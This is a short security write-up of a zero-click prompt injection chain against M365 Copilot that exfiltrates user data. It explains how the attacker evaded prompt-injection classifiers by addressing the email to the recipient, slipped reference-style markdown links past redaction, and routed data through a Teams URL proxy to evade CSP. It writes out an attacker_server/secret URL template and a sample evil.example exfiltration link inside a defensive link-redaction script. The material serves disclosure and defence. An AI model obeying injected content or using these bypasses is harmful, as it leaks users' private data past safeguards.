In this blog you will learn about an M365 Copilot vulnerability.
A zero-click attack chain results in the compromise of Copilot data integrity.
High Level
OWASP Top 10
- Indirect Prompt Injection
Exploitation technique
- LLM Scope Violation
Risk
- Data Exfiltration
Vulnerabilities
- Bypassing XPIA Classifiers [AI Vulnerability]
- Bypassing External Link Redaction [Traditional Vulnerability]
- Bypassing CSP [Traditional Vulnerability]
Security Measures
- Runtime Guardrails
- DLP
Brief Explanation
What is LLM Scope Violation
The term describes situations where an attacker’s specific instructions to the LLM (which originate in untrusted inputs) make the LLM attend to trusted data in the model’s context, without the user’s explicit consent.
Attack Chain [How attack was performed]
- Bypassing the Cross Prompt Injection [XPIA] classifiers. This was bypassed by directing the email at the recipient rather than at the LLM. The MS guardrail wasn’t good enough [AI Vulnerability]
- Bypassing link redaction. Reference-style markdown links are not redacted and are not recognized by Microsoft [Traditional Vulnerability]
- Bypassing CSP by using an MS Teams domain: "https://eu-prod.asyncgw.teams.microsoft.com/urlp/v1/url/content?url=<attacker_server>/<secret>&v=1" [Traditional Vulnerability]
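A defender-side sketch of the link redaction step from the attack chain above, added here as an example and not Microsoft's code or code from the original post. It redacts reference-style links as well as inline ones, and treats an allowed host that carries a nested URL parameter as external. `ALLOWED_HOSTS`, the function names and the `evil.example` placeholder are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: hosts the chat renderer may link to (example values, not Microsoft's list).
ALLOWED_HOSTS = {"contoso.sharepoint.com", "eu-prod.asyncgw.teams.microsoft.com"}

INLINE = re.compile(r"(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
REF_USE = re.compile(r"(!?)\[([^\]]*)\]\[([^\]]*)\]")
REF_DEF = re.compile(r"^ {0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t]+.*)?$", re.M)

def is_external(url, allowed=ALLOWED_HOSTS):
    """True if the URL leaves the allow-list, directly or through a nested URL parameter."""
    parts = urlsplit(url)
    if parts.scheme not in ("", "http", "https"):
        return True
    host = (parts.hostname or "").lower()
    if host and host not in allowed:
        return True
    # Heuristic: an allowed host that fetches a URL passed in its query string is still an exit.
    return any(re.match(r"(?i)(https?:)?//", v) for _, v in parse_qsl(parts.query))

def redact_links(md, allowed=ALLOWED_HOSTS):
    # Reference labels are case-insensitive, so normalise before comparing.
    bad = {m.group(1).strip().lower() for m in REF_DEF.finditer(md)
           if is_external(m.group(2), allowed)}
    def plain(m):  # keep the visible text, drop the target
        return "[image removed]" if m.group(1) else m.group(2)
    def drop_def(m):
        return "" if m.group(1).strip().lower() in bad else m.group(0)
    def fix_use(m):
        label = (m.group(3) or m.group(2)).strip().lower()
        return plain(m) if label in bad else m.group(0)
    def fix_inline(m):
        return plain(m) if is_external(m.group(3), allowed) else m.group(0)

    # Removing the definition neutralises every use of the label, shortcut form included.
    md = REF_DEF.sub(drop_def, md)
    return INLINE.sub(fix_inline, REF_USE.sub(fix_use, md))

# Constructed sample of model output; evil.example is a placeholder host.
SAMPLE = """See [the report][r1], ![chart][R2] and [inline](https://evil.example/?d=SECRET).
Source: [doc](https://contoso.sharepoint.com/doc)

[r1]: https://evil.example/c?d=SECRET
[r2]: https://eu-prod.asyncgw.teams.microsoft.com/urlp/v1/url/content?url=https://evil.example/SECRET&v=1
"""

if __name__ == "__main__":
    print(redact_links(SAMPLE))
```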
Exploitation
- RAG spraying: distributing chunks of the malicious content across many points in the latent space
- Attacker email [underprivileged program] accessing privileged data, then reaching the attacker domain with sensitive data as parameters.